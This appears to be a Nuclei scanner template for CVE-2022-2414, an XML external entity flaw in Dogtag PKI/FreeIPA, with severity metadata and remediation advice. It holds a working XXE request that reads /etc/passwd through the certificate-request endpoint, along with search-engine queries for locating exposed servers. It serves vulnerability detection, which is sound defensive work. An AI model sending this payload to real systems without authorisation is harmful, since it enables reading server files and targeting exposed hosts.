Description
Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.
Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.
id: CVE-2022-2414
info:
name: FreeIPA - XML Entity Injection
author: DhiyaneshDk
severity: high
description: |
Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.
impact: |
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server.
remediation: |
Apply the latest security patches and updates provided by the vendor to fix the XML Entity Injection vulnerability in FreeIPA.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/Dogtag/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-2414
- https://github.com/dogtagpki/pki/pull/4021
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-2414
cwe-id: CWE-611
epss-score: 0.85608
epss-percentile: 0.99711
cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: dogtagpki
product: dogtagpki
shodan-query:
- title:"Identity Management" html:"FreeIPA"
- http.title:"identity management" html:"freeipa"
fofa-query:
- title="Identity Management"
- title="identity management"
- title="identity management" html:"freeipa"
google-query: intitle:"identity management" html:"freeipa"
tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki,vkev,vuln
http:
- raw:
- |
POST /ca/rest/certrequests HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&ent;</ProfileID>
</CertEnrollmentRequest>
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- "PKIException"
- type: word
part: header
words:
- "application/xml"
- type: status
status:
- 400
# digest: 4b0a004830460221008acc0c358ca9ebe2fd9258d65b6c0fa65867cea13f0174858ee4534108ff3df9022100c8db84b3cc56b5e534d1e803af04888a12e0e1935bd9d585ae756f2a1966150b:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.